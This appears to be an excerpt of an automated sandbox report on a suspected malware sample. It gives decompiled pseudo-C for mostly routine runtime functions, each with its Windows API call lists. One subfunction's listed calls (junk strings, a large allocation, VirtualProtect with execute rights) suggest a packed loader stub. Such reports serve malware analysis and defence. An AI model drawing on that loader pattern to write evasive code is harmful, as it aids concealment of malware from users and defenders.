    				_t60 =  *0x301309c; // 0x0
    				if(_t60 == 0) {
    					__imp__HeapSetInformation(0, 1, 0, 0);
    				}
    				_t61 =  *0x3000000 - 0x5a4d; // 0x5a4d
    				if(_t61 == 0) {
    					_t22 =  *0x300003c; // 0xe8
    					__eflags =  *((intOrPtr*)(_t22 + 0x3000000)) - 0x4550;
    					if( *((intOrPtr*)(_t22 + 0x3000000)) != 0x4550) {
    						goto L3;
    					} else {
    						__eflags =  *((intOrPtr*)(_t22 + 0x3000018)) - 0x10b;
    						if( *((intOrPtr*)(_t22 + 0x3000018)) != 0x10b) {
    							goto L3;
    						} else {
    							__eflags =  *((intOrPtr*)(_t22 + 0x3000074)) - 0xe;
    							if( *((intOrPtr*)(_t22 + 0x3000074)) <= 0xe) {
    								goto L3;
    							} else {
    								__eflags =  *(_t22 + 0x30000e8);
    								_t8 =  *(_t22 + 0x30000e8) != 0;
    								__eflags = _t8;
    								 *(_t59 - 0x1c) = 0 | _t8;
    							}
    						}
    					}
    				} else {
    					L3:
    					 *(_t59 - 0x1c) = 0;
    				}
    				if(E03005004() == 0) {
    					E03002CEB(0x1c);
    				}
    				if(E03004E89(_t43) == 0) {
    					E03002CEB(0x10);
    				}
    				E03004B44();
    				 *((intOrPtr*)(_t59 - 4)) = 0;
    				_t26 = E030048FF();
    				_t64 = _t26;
    				if(_t26 < 0) {
    					_push(0x1b);
    					E0300420B(_t55, _t64);
    				}
    				 *0x3013098 = GetCommandLineW();
    				 *0x300bdc4 = E030048A7();
    				_t29 = E030047F9();
    				_t65 = _t29;
    				if(_t29 < 0) {
    					_push(8);
    					_t29 = E0300420B(_t55, _t65);
    				}
    				_t30 = E030045C7(_t29, _t43);
    				_t66 = _t30;
    				if(_t30 < 0) {
    					_push(9);
    					E0300420B(_t55, _t66);
    				}
    				_t31 = E03003FEA(_t56, 0, 1);
    				_t67 = _t31;
    				if(_t31 != 0) {
    					_push(_t31);
    					E0300420B(_t55, _t67);
    				}
    				_t32 = E03004581();
    				_t68 =  *(_t59 - 0x3c) & 0x00000001;
    				if(( *(_t59 - 0x3c) & 0x00000001) == 0) {
    					_t45 = 0xa;
    				} else {
    					_t45 =  *(_t59 - 0x38) & 0x0000ffff;
    				}
    				 *((intOrPtr*)(_t59 - 0x20)) = E0300966F(_t68, 0x3000000, 0, _t32, _t45);
    				if( *(_t59 - 0x1c) == 0) {
    					E030041C1(_t33);
    				}
    				E030041ED();
    				 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
    				return E03005075( *((intOrPtr*)(_t59 - 0x20)));
    			}


















    APIs
    • GetStartupInfoW.KERNEL32(?,03009808,00000058), ref: 03002D24
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 03002D39
      • Part of subcall function 03005004: HeapCreate.KERNEL32(00000000,00001000,00000000,03002D8D), ref: 0300500D
      • Part of subcall function 03004E89: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03002D9E), ref: 03004E91
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,03002D9E), ref: 03004EB3
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,03002D9E), ref: 03004EC0
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,03002D9E), ref: 03004ECD
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsFree,?,03002D9E), ref: 03004EDA
      • Part of subcall function 03004E89: TlsAlloc.KERNEL32(?,03002D9E), ref: 03004F2A
      • Part of subcall function 03004E89: TlsSetValue.KERNEL32(00000000,?,03002D9E), ref: 03004F45
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F60
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F6D
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F7A
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F87
      • Part of subcall function 03004E89: DecodePointer.KERNEL32(03004D5A,?,03002D9E), ref: 03004FA8
      • Part of subcall function 03004E89: DecodePointer.KERNEL32(00000000,?,03002D9E), ref: 03004FD7
      • Part of subcall function 03004E89: GetCurrentThreadId.KERNEL32(?,03002D9E), ref: 03004FE9
    • __RTC_Initialize.LIBCMT ref: 03002DAA
      • Part of subcall function 030048FF: GetStartupInfoW.KERNEL32(?), ref: 0300490C
      • Part of subcall function 030048FF: GetFileType.KERNEL32(?), ref: 03004A3F
      • Part of subcall function 030048FF: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 03004A75
      • Part of subcall function 030048FF: GetStdHandle.KERNEL32(-000000F6), ref: 03004AC9
      • Part of subcall function 030048FF: GetFileType.KERNEL32(00000000), ref: 03004ADB
      • Part of subcall function 030048FF: InitializeCriticalSectionAndSpinCount.KERNEL32(-03012F74,00000FA0), ref: 03004B09
      • Part of subcall function 030048FF: SetHandleCount.KERNEL32 ref: 03004B32
    • __amsg_exit.LIBCMT ref: 03002DBD
    • GetCommandLineW.KERNEL32 ref: 03002DC3
      • Part of subcall function 030048A7: GetEnvironmentStringsW.KERNEL32(00000000,03002DD3), ref: 030048AA
      • Part of subcall function 030048A7: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 030048E6
      • Part of subcall function 030047F9: GetModuleFileNameW.KERNEL32(00000000,0300C430,00000104), ref: 03004819
      • Part of subcall function 030047F9: _wparse_cmdline.LIBCMT ref: 03004843
      • Part of subcall function 030047F9: _wparse_cmdline.LIBCMT ref: 03004885
    • __amsg_exit.LIBCMT ref: 03002DE3
      • Part of subcall function 030045C7: _wcslen.LIBCMT ref: 030045E7
      • Part of subcall function 030045C7: _wcslen.LIBCMT ref: 0300461F
    • __amsg_exit.LIBCMT ref: 03002DF4
      • Part of subcall function 03003FEA: __initterm_e.LIBCMT ref: 03004020
    • __amsg_exit.LIBCMT ref: 03002E07
      • Part of subcall function 0300966F: _strlen.LIBCMT ref: 0300967E
      • Part of subcall function 0300966F: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 030096AA
      • Part of subcall function 0300966F: ShellAboutW.SHELL32(00000000,00000000,00000000,00000000), ref: 030096B4
      • Part of subcall function 0300966F: ExtractIconA.SHELL32(00000000,00000000,00000000), ref: 030096BD
      • Part of subcall function 0300966F: GetColorSpace.GDI32(00000000), ref: 030096DF
      • Part of subcall function 0300966F: GetLogColorSpaceA.GDI32(00000000,00000000,00000000), ref: 030096E8
      • Part of subcall function 0300966F: ChoosePixelFormat.GDI32(00000000,?), ref: 030096F3
      • Part of subcall function 0300966F: SetICMMode.GDI32(00000000,00000000), ref: 030096FB
      • Part of subcall function 0300966F: GetPrivateProfileSectionNamesA.KERNEL32(0300CB48,00000000,doifughsg siodufhg sdfoughjsiopdfughj), ref: 0300970E
      • Part of subcall function 0300966F: GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?), ref: 0300971F
      • Part of subcall function 0300966F: GetLocaleInfoW.KERNEL32(00000000,00000000,0300CF50,00000000), ref: 0300972D
      • Part of subcall function 0300966F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03009760
      • Part of subcall function 0300966F: LocalAlloc.KERNEL32(00000000,000583E9), ref: 03009778
      • Part of subcall function 0300966F: VirtualProtect.KERNEL32(00000000,000583E9,00000040,?), ref: 030097D9
      • Part of subcall function 0300966F: GetTickCount.KERNEL32 ref: 030097E4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x45308c; // 0x454044
    				if( *_t14 == 0) {
    					_t16 =  *0x452f6c; // 0x405f30
    					_t9 = _t16 + 4; // 0xffe9
    					_t18 =  *0x454660; // 0x400000
    					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x452f90; // 0x454214
    				E00402784(E00402A8C(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00407764( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
    			}













    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00401A74() {
    				void* _t2;
    				void* _t3;
    				void* _t14;
    				intOrPtr* _t19;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				intOrPtr _t28;
    
    				_t26 = _t28;
    				if( *0x4545bc == 0) {
    					return _t2;
    				} else {
    					_push(_t26);
    					_push(E00401B4A);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t28;
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L0040130C();
    					}
    					 *0x4545bc = 0;
    					_t3 =  *0x45461c; // 0x0
    					LocalFree(_t3);
    					 *0x45461c = 0;
    					_t19 =  *0x4545e4; // 0x4545e4
    					while(_t19 != 0x4545e4) {
    						_t1 = _t19 + 8; // 0x0
    						VirtualFree( *_t1, 0, 0x8000);
    						_t19 =  *_t19;
    					}
    					E00401374(0x4545e4);
    					E00401374(0x4545f4);
    					E00401374(0x454620);
    					_t14 =  *0x4545dc; // 0x0
    					while(_t14 != 0) {
    						 *0x4545dc =  *_t14;
    						LocalFree(_t14);
    						_t14 =  *0x4545dc; // 0x0
    					}
    					_pop(_t23);
    					 *[fs:eax] = _t23;
    					_push(0x401b51);
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L00401314();
    					}
    					_push(0x4545c4);
    					L0040131C();
    					return 0;
    				}
    			}











    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40b7df);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040B3A0();
    				E00409E60(__ebx, __edi, __esi);
    				_t196 =  *0x454744;
    				if( *0x454744 != 0) {
    					E0040A038(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E00409DB0(_t43, 0, 0x14,  &_v20);
    				E00403EDC(0x454678, _v20);
    				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
    				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
    				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
    				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
    				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
    				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
    				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
    				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
    				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
    				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00403EDC(0x454684, _v36);
    				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00403EDC(0x454688, _v44);
    				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
    				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
    				E00403EDC(0x454690, _v52);
    				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
    				E00403EDC(0x454694, _v56);
    				E00403E88( &_v12);
    				E00403E88( &_v16);
    				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
    				_t104 = E00407174(0x40b7f4, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00403F20( &_v8, 0x40b84c);
    				} else {
    					E00403F20( &_v8, 0x40b840);
    				}
    				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
    				_t111 = E00407174(0x40b7f4, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
    					if(E00407174(0x40b7f4, 0, _t198) != 0) {
    						E00403F20( &_v12, 0x40b868);
    					} else {
    						E00403F20( &_v16, 0x40b858);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404208();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404208();
    				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040B7E6);
    				return E00403EAC( &_v68, 0x10);
    			}

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				signed short* _v792;
    				char _v796;
    				char _v800;
    				intOrPtr* _v804;
    				void* __ebp;
    				signed char _t47;
    				signed int _t54;
    				void* _t62;
    				intOrPtr* _t73;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t98;
    				void* _t99;
    				intOrPtr* _t108;
    				void* _t112;
    				intOrPtr _t113;
    				char* _t114;
    				void* _t115;
    
    				_t100 = __ecx;
    				_v780 = __ecx;
    				_t91 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t47 =  *_t91;
    				if((_t47 & 0x00000fff) != 0xc) {
    					_push(_t91);
    					_push(_v776);
    					L0040C5A0();
    					return E0040D7EC(_v776);
    				} else {
    					if((_t47 & 0x00000040) == 0) {
    						_v792 =  *((intOrPtr*)(_t91 + 8));
    					} else {
    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
    					}
    					_v788 =  *_v792 & 0x0000ffff;
    					_t93 = _v788 - 1;
    					if(_t93 < 0) {
    						L9:
    						_push( &_v772);
    						_t54 = _v788;
    						_push(_t54);
    						_push(0xc);
    						L0040C9F4();
    						_t113 = _t54;
    						if(_t113 == 0) {
    							E0040D544(_t100);
    						}
    						E0040DB18(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _t113;
    						_t95 = _v788 - 1;
    						if(_t95 < 0) {
    							L14:
    							_t97 = _v788 - 1;
    							if(E0040DB34(_v788 - 1, _t115) != 0) {
    								L0040CA0C();
    								E0040D7EC(_v792);
    								L0040CA0C();
    								E0040D7EC( &_v260);
    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
    							}
    							_t62 = E0040DB64(_t97, _t115);
    						} else {
    							_t98 = _t95 + 1;
    							_t73 =  &_v768;
    							_t108 =  &_v260;
    							do {
    								 *_t108 =  *_t73;
    								_t108 = _t108 + 4;
    								_t73 = _t73 + 8;
    								_t98 = _t98 - 1;
    							} while (_t98 != 0);
    							do {
    								goto L14;
    							} while (_t62 != 0);
    							return _t62;
    						}
    					} else {
    						_t99 = _t93 + 1;
    						_t112 = 0;
    						_t114 =  &_v772;
    						do {
    							_v804 = _t114;
    							_push(_v804 + 4);
    							_t18 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040C9FC();
    							E0040D7EC(_v792);
    							_push( &_v784);
    							_t21 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040CA04();
    							E0040D7EC(_v792);
    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
    							_t112 = _t112 + 1;
    							_t114 = _t114 + 8;
    							_t99 = _t99 - 1;
    						} while (_t99 != 0);
    						goto L9;
    					}
    				}
    			}

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x454044 == 0) {
    					if( *0x419030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
    						 *0x454230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
    				}
    			}

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E0300818A(intOrPtr* _a4, int _a8, signed int _a12, char* _a16, int _a20, short* _a24, int _a28, int _a32, intOrPtr _a36) {
    				signed int _v8;
    				int _v12;
    				int _v16;
    				int _v20;
    				void* _v32;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t67;
    				int _t73;
    				short* _t75;
    				short* _t77;
    				short* _t78;
    				signed int _t81;
    				void* _t83;
    				int _t84;
    				int _t86;
    				signed int _t88;
    				void* _t90;
    				short* _t91;
    				char* _t96;
    				int _t99;
    				signed int _t108;
    				signed int _t109;
    				int _t112;
    				signed int _t113;
    				signed int _t115;
    				int _t116;
    
    				_t67 =  *0x300bbe4; // 0xbb40e64e
    				_v8 = _t67 ^ _t115;
    				_t109 = _a20;
    				if(_t109 <= 0) {
    					L8:
    					_v12 = 0;
    					if(_a32 == 0) {
    						_a32 =  *((intOrPtr*)( *_a4 + 4));
    					}
    					_t114 = MultiByteToWideChar;
    					_t112 = MultiByteToWideChar(_a32, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _a20, 0, 0);
    					_v20 = _t112;
    					if(_t112 != 0) {
    						if(__eflags <= 0) {
    							L21:
    							_v16 = 0;
    							L22:
    							__eflags = _v16;
    							if(_v16 == 0) {
    								goto L11;
    							}
    							_t75 = MultiByteToWideChar(_a32, 1, _a16, _a20, _v16, _t112);
    							__eflags = _t75;
    							if(_t75 == 0) {
    								L45:
    								E0300816A(_v16);
    								_t73 = _v12;
    								goto L46;
    							}
    							_t114 = LCMapStringW;
    							_t77 = LCMapStringW(_a8, _a12, _v16, _t112, 0, 0);
    							_v12 = _t77;
    							__eflags = _t77;
    							if(_t77 == 0) {
    								goto L45;
    							}
    							__eflags = _a12 & 0x00000400;
    							if((_a12 & 0x00000400) == 0) {
    								_t113 = _v12;
    								__eflags = _t113;
    								if(_t113 <= 0) {
    									L37:
    									_t112 = 0;
    									__eflags = 0;
    									L38:
    									__eflags = _t112;
    									if(_t112 != 0) {
    										_t78 = LCMapStringW(_a8, _a12, _v16, _v20, _t112, _v12);
    										__eflags = _t78;
    										if(_t78 != 0) {
    											_push(0);
    											_push(0);
    											__eflags = _a28;
    											if(_a28 != 0) {
    												_push(_a28);
    												_push(_a24);
    											} else {
    												_push(0);
    												_push(0);
    											}
    											_v12 = WideCharToMultiByte(_a32, 0, _t112, _v12, ??, ??, ??, ??);
    										}
    										E0300816A(_t112);
    									}
    									goto L45;
    								}
    								_t81 = 0xffffffe0;
    								_t109 = _t81 % _t113;
    								__eflags = _t81 / _t113 - 2;
    								if(_t81 / _t113 < 2) {
    									goto L37;
    								}
    								_t83 = _t113 + _t113 + 8;
    								__eflags = _t83 - 0x400;
    								if(_t83 > 0x400) {
    									_t84 = E030089C5(_t109, _t113, LCMapStringW, _t83);
    									__eflags = _t84;
    									if(_t84 != 0) {
    										 *_t84 = 0xdddd;
    										_t84 = _t84 + 8;
    										__eflags = _t84;
    									}
    									_t112 = _t84;
    									goto L38;
    								}
    								E03009200(_t83);
    								_t112 = _t116;
    								__eflags = _t112;
    								if(_t112 == 0) {
    									goto L45;
    								}
    								 *_t112 = 0xcccc;
    								_t112 = _t112 + 8;
    								goto L38;
    							}
    							_t86 = _a28;
    							__eflags = _t86;
    							if(_t86 != 0) {
    								__eflags = _v12 - _t86;
    								if(_v12 <= _t86) {
    									LCMapStringW(_a8, _a12, _v16, _t112, _a24, _t86);
    								}
    							}
    							goto L45;
    						}
    						_t88 = 0xffffffe0;
    						_t109 = _t88 % _t112;
    						__eflags = _t88 / _t112 - 2;
    						if(_t88 / _t112 < 2) {
    							goto L21;
    						}
    						_t24 = _t112 + 8; // 0x8
    						_t90 = _t112 + _t24;
    						__eflags = _t90 - 0x400;
    						if(_t90 > 0x400) {
    							_t91 = E030089C5(_t109, _t112, MultiByteToWideChar, _t90);
    							__eflags = _t91;
    							if(_t91 == 0) {
    								L20:
    								_v16 = _t91;
    								goto L22;
    							}
    							 *_t91 = 0xdddd;
    							L19:
    							_t91 =  &(_t91[4]);
    							__eflags = _t91;
    							goto L20;
    						}
    						E03009200(_t90);
    						_t91 = _t116;
    						__eflags = _t91;
    						if(_t91 == 0) {
    							goto L20;
    						}
    						 *_t91 = 0xcccc;
    						goto L19;
    					} else {
    						L11:
    						_t73 = 0;
    						L46:
    						return E03006BA0(_t73, 0, _v8 ^ _t115, _t109, _t112, _t114);
    					}
    				} else {
    					_t96 = _a16;
    					_t108 = _t109;
    					while(1) {
    						_t108 = _t108 - 1;
    						if( *_t96 == 0) {
    							break;
    						}
    						_t96 =  &(_t96[1]);
    						if(_t108 != 0) {
    							continue;
    						} else {
    							_t108 = _t108 | 0xffffffff;
    							break;
    						}
    					}
    					_t99 = _t109 - _t108 - 1;
    					if(_t99 < _t109) {
    						_t99 = _t99 + 1;
    					}
    					_a20 = _t99;
    					goto L8;
    				}
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,00000000), ref: 030081FB
    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008269
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008285
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,?,?,00000000), ref: 030082BE
      • Part of subcall function 030089C5: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,030068FF,?,00000001,?,?,03006E19,00000018,03009958,0000000C,03006EA9), ref: 03008A0A
    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,?,?,?,?,00000000), ref: 03008324
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 03008343
    • __freea.LIBCMT ref: 0300834D
    • __freea.LIBCMT ref: 03008356
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
